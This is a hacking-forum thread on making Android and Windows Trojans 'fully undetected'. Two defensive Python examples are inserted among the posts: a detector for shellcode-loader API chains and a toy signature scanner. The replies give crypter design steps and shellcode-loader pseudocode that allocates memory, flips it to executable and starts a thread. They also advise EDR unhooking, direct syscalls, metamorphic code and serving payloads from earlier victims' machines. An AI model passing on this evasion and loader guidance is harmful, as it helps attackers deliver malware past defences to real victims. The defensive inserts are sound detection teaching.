How to make a Trojan FUD?
by xyzuser - Thursday October 26, 2023 at 07:01 PM
#1
Hello guys 
I wanted to make a payload that is fully undetected for Android (APK) and Windows (EXE). I just want to know how Trojans in general become undetected.
Reply
#2
Write your own crypter. :D
Reply
#3
Build it from scratch and don't upload it to VirusTotal.

Starting with a keylogger would be my suggestion.
Reply
#4
You could try bypassing the EDR hooks, but they are pretty good at detecting unhooking these days.

Here are a couple of recent blog posts about some of the tactics: https://malwaretech.com/2023/12/an-intro...hooks.html and https://malwaretech.com/2023/12/silly-ed...-them.html
Reply
#5
The links are helpful, thanks.
Reply
#6
(01-22-2024, 10:01 PM)Meanjellybean Wrote: Build it from scratch and don't upload it to VirusTotal.

Starting with a keylogger would be my suggestion.

I think the best way to start developing a crypter is to start with shellcode; you can generate one even with msfvenom. If you achieve FUD msfvenom shellcode injection, you can proceed to learn about process injection.

Your basic crypter should: 
1. Decrypt payload in-memory
2. Allocate RW memory
3. Move payload to allocated memory 
4. Change allocated memory protection to RX
5. Create new thread at base address of allocated memory


pseudo code:
// assumes the payload has already been decrypted in memory (step 1)
shellcode = [ 0x4C, 0x8B, 0xD1, 0xB8, 0xBE, 0x0F, 0x05 ... ]
currentProcess = GetCurrentProcess()

// step 2: allocate RW memory in the current process
baseAddress = AllocateVirtualMemory(currentProcess, shellcode.length, MEM_COMMIT, PAGE_READWRITE)
// step 3: copy the payload into the new region
Move(shellcode, baseAddress)
// step 4: flip the region to RX; the previous protection comes back through oldProtection
VirtualProtectEx(currentProcess, baseAddress, shellcode.length, PAGE_EXECUTE_READ, &oldProtection)

// step 5: start a thread at the base of the region and wait for it to finish
threadHandle = CreateThread(currentProcess, baseAddress)
WaitForSingleObject(threadHandle, INFINITE)


The crypter also needs an anti-memory-scanning method, which works as an encrypt/decrypt loop over the payload that lives in the allocated memory.
And don't forget about direct syscalls or unhooking, because every modern AV/EDR will detect this WinAPI call chain and flag your binary as a virus.

https://github.com/JLospinoso/gargoyle
https://github.com/am0nsec/HellsGate
Reply
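The post above says an EDR will flag the allocate-RW, flip-to-RX, create-thread chain. Here is what that detection looks like from the defender's side, as an added example that is not part of the original post: a small Python detector run over a constructed API-call trace. The trace line format (pid=, api=, addr=, size=, prot=, start=) is an assumption made for the example, not any real product's log format; it includes both the Win32 names and the Nt* names so the same logic covers a loader that goes through direct syscalls, since kernel-side telemetry sees the same sequence either way.

```python
"""Toy detector for the RW-alloc -> RX-protect -> CreateThread loader chain.

Constructed example; the trace format below is an assumption, not a real
EDR/ETW schema. Each line is one recorded API call for one process.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

LINE_RE = re.compile(r"pid=(?P<pid>\d+) api=(?P<api>\w+)(?P<rest>.*)")
KV_RE = re.compile(r"(\w+)=(\S+)")

EXEC_PROTS = {
    "PAGE_EXECUTE", "PAGE_EXECUTE_READ",
    "PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY",
}
ALLOC_APIS = {"VirtualAlloc", "VirtualAllocEx", "NtAllocateVirtualMemory"}
PROTECT_APIS = {"VirtualProtect", "VirtualProtectEx", "NtProtectVirtualMemory"}
THREAD_APIS = {"CreateThread", "CreateRemoteThread", "NtCreateThreadEx"}


@dataclass
class Region:
    base: int
    size: int
    prot: str
    was_rw: bool  # allocated writable, so a payload could have been copied in

    def contains(self, addr: int) -> bool:
        return self.base <= addr < self.base + self.size


def parse(line: str) -> Optional[Tuple[int, str, Dict[str, str]]]:
    """Split one trace line into (pid, api, key/value fields)."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    fields = dict(KV_RE.findall(m.group("rest")))
    return int(m.group("pid")), m.group("api"), fields


def detect(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (pid, region_base, reason) for every thread started inside a
    private allocation that is executable at the time the thread is created."""
    regions: Dict[int, List[Region]] = {}
    alerts: List[Tuple[int, str, str]] = []
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        pid, api, f = parsed
        regs = regions.setdefault(pid, [])
        if api in ALLOC_APIS:
            prot = f["prot"]
            regs.append(Region(int(f["addr"], 16), int(f["size"]), prot,
                               was_rw=(prot == "PAGE_READWRITE")))
        elif api in PROTECT_APIS:
            addr = int(f["addr"], 16)
            for r in regs:
                if r.contains(addr):
                    r.prot = f["prot"]  # track the RW -> RX flip
        elif api in THREAD_APIS:
            start = int(f["start"], 16)
            for r in regs:
                if r.contains(start) and r.prot in EXEC_PROTS:
                    reason = ("RW->RX flip then thread start" if r.was_rw
                              else "thread start in RWX private allocation")
                    alerts.append((pid, hex(r.base), reason))
    return alerts


# Constructed trace: pid 4120 is the loader chain from the post, pid 5300 is a
# benign process that allocates a RW buffer and starts a thread in its own
# image, pid 6010 is the noisier RWX variant done through direct syscalls.
TRACE = """
pid=4120 api=VirtualAlloc addr=0x1f0000 size=4096 prot=PAGE_READWRITE
pid=4120 api=VirtualProtect addr=0x1f0000 size=4096 prot=PAGE_EXECUTE_READ
pid=4120 api=CreateThread start=0x1f0000
pid=5300 api=VirtualAlloc addr=0x2a0000 size=65536 prot=PAGE_READWRITE
pid=5300 api=CreateThread start=0x7ff6c0001000
pid=6010 api=NtAllocateVirtualMemory addr=0x3b0000 size=4096 prot=PAGE_EXECUTE_READWRITE
pid=6010 api=NtCreateThreadEx start=0x3b0000
""".strip().splitlines()

if __name__ == "__main__":
    for pid, base, reason in detect(TRACE):
        print(f"ALERT pid={pid} region={base}: {reason}")
```

The rule keys on the state of the region at thread-creation time, not on any single API name, which is why renaming the calls (or reaching them through a direct syscall stub) does not change the verdict when the telemetry comes from below the user-mode hooks. The benign pid 5300 is not flagged because its thread starts inside a mapped image, not inside the private RW buffer.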
#7
A few other tips:
- Re-use code that is used by legitimate programs to achieve your objective; it makes it harder to add detection rules that don't break said legitimate programs.
- Don't use fishy techniques that are easily caught by detection rules.
- Make your assembly code metamorphic and don't use obfuscation that looks suspicious.

Also, don't put the method used to randomize the assembly in the payload sent to your targets; rather, have it done on past targets that are known not to have anti-malware, Defender, IDS/IPS etc., and serve it to your targets from them.

To serve payloads from past targets, you can use, for example, already opened and forwarded ports, servers, or add UPnP rules when possible.
Reply
#8
Also, another tip: there are lots of source codes on GitHub that show how malware encryption and AV evasion work. Check this out: https://github.com/search?q=crypter&type...ars&o=desc
Reply
#9
(10-26-2023, 07:01 PM)xyzuser Wrote: Hello guys 
I wanted to make a payload that is fully undetected for Android (APK) and Windows (EXE). I just want to know how Trojans in general become undetected.

First you need to know how anti-virus products detect malware.
Most AV products use the following techniques:
Signature-based Detection
which basically compares files against a database of known malware signatures.

Heuristic Analysis
detects malware based on its behavior rather than specific signatures (e.g. if there is anything suspicious, such as registry changes on Windows, it detects it as malware).

Sandboxing
executing the malware in a sandbox to observe its behavior.

etc etc etc.


I'm such a yapper lol.

How to bypass them? Simply don't upload your shit to VirusTotal, and apply more techniques like encryption/obfuscation/code signing if you have a cert (on Windows).
Check this article: https://www.vaadata.com/blog/antivirus-a...echniques/
Reply
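To make the signature-based layer from the post above concrete, here is an added example (not from the original post or any AV product) of a toy static scanner in Python with two signature types: an exact file hash and a YARA-style hex pattern with `??` wildcards. The sample "binaries", the signature names and the pattern are all constructed for the example; the pattern bytes are the `mov r10, rcx; mov eax, imm32; syscall` stub shape that the pseudocode earlier in the thread starts with. It shows why a one-byte change defeats a hash signature but not a wildcard byte pattern, and why an encrypted copy defeats both.

```python
"""Toy static scanner: hash signatures plus wildcard byte-pattern signatures.

Everything here (samples, signature names, pattern) is constructed for the
example; it is not a real AV engine or real signature set.
"""
import hashlib
from typing import Dict, List, Optional


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def parse_hex_pattern(pattern: str) -> List[Optional[int]]:
    """'4C 8B D1 ?? 0F 05' -> [0x4C, 0x8B, 0xD1, None, 0x0F, 0x05]; None is a wildcard."""
    return [None if tok == "??" else int(tok, 16) for tok in pattern.split()]


def pattern_offset(data: bytes, pattern: List[Optional[int]]) -> Optional[int]:
    """Return the first offset where the pattern matches, or None."""
    n = len(pattern)
    for i in range(len(data) - n + 1):
        if all(p is None or data[i + j] == p for j, p in enumerate(pattern)):
            return i
    return None


def scan(data: bytes, hash_sigs: Dict[str, str], pattern_sigs: Dict[str, str]) -> List[str]:
    """Return the list of signature hits, prefixed by signature type."""
    hits: List[str] = []
    digest = sha256_hex(data)
    for name, sig in hash_sigs.items():
        if sig == digest:
            hits.append(f"hash:{name}")
    for name, pat in pattern_sigs.items():
        if pattern_offset(data, parse_hex_pattern(pat)) is not None:
            hits.append(f"pattern:{name}")
    return hits


# Constructed sample: a fake header, a NOP sled, then a syscall-stub shaped
# sequence (mov r10,rcx / mov eax,0x18 / syscall) followed by padding.
ORIGINAL = (b"MZ" + b"\x90" * 16
            + bytes([0x4C, 0x8B, 0xD1, 0xB8, 0x18, 0x00, 0x00, 0x00, 0x0F, 0x05])
            + b"\x00" * 8)

# Same sample with one byte inside the NOP sled changed: hash differs, code does not.
_variant = bytearray(ORIGINAL)
_variant[5] = 0x41
VARIANT = bytes(_variant)

# Same sample single-byte XOR "encrypted", as a crypter would store it at rest.
XOR_KEY = 0x5A
ENCRYPTED = bytes(b ^ XOR_KEY for b in ORIGINAL)

HASH_SIGS = {"sample.hash": sha256_hex(ORIGINAL)}
PATTERN_SIGS = {"syscall_stub": "4C 8B D1 B8 ?? ?? ?? ?? 0F 05"}


def scan_all() -> Dict[str, List[str]]:
    """Scan the three constructed samples against both signature sets."""
    return {
        "original": scan(ORIGINAL, HASH_SIGS, PATTERN_SIGS),
        "variant": scan(VARIANT, HASH_SIGS, PATTERN_SIGS),
        "encrypted": scan(ENCRYPTED, HASH_SIGS, PATTERN_SIGS),
    }


if __name__ == "__main__":
    for label, hits in scan_all().items():
        print(f"{label:9s} -> {hits or 'clean'}")
```

The encrypted copy is "clean" to this scanner only because nothing in it is scanned after decryption; the stub that decrypts it is now the constant part of the file and becomes the next signature, which is why the earlier posts in the thread move on to in-memory scanning and behavioral detection.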
#10
(01-23-2024, 03:06 PM)red_dot Wrote:
(01-22-2024, 10:01 PM)Meanjellybean Wrote: Build it from scratch and don't upload it to VirusTotal.

Starting with a keylogger would be my suggestion.

I think the best way to start developing a crypter is to start with shellcode; you can generate one even with msfvenom. If you achieve FUD msfvenom shellcode injection, you can proceed to learn about process injection.

Your basic crypter should: 
1. Decrypt payload in-memory
2. Allocate RW memory
3. Move payload to allocated memory 
4. Change allocated memory protection to RX
5. Create new thread at base address of allocated memory


pseudo code:
// assumes the payload has already been decrypted in memory (step 1)
shellcode = [ 0x4C, 0x8B, 0xD1, 0xB8, 0xBE, 0x0F, 0x05 ... ]
currentProcess = GetCurrentProcess()

// step 2: allocate RW memory in the current process
baseAddress = AllocateVirtualMemory(currentProcess, shellcode.length, MEM_COMMIT, PAGE_READWRITE)
// step 3: copy the payload into the new region
Move(shellcode, baseAddress)
// step 4: flip the region to RX; the previous protection comes back through oldProtection
VirtualProtectEx(currentProcess, baseAddress, shellcode.length, PAGE_EXECUTE_READ, &oldProtection)

// step 5: start a thread at the base of the region and wait for it to finish
threadHandle = CreateThread(currentProcess, baseAddress)
WaitForSingleObject(threadHandle, INFINITE)


The crypter also needs an anti-memory-scanning method, which works as an encrypt/decrypt loop over the payload that lives in the allocated memory.
And don't forget about direct syscalls or unhooking, because every modern AV/EDR will detect this WinAPI call chain and flag your binary as a virus.

https://github.com/JLospinoso/gargoyle
https://github.com/am0nsec/HellsGate

Nice info, keep it going.
Reply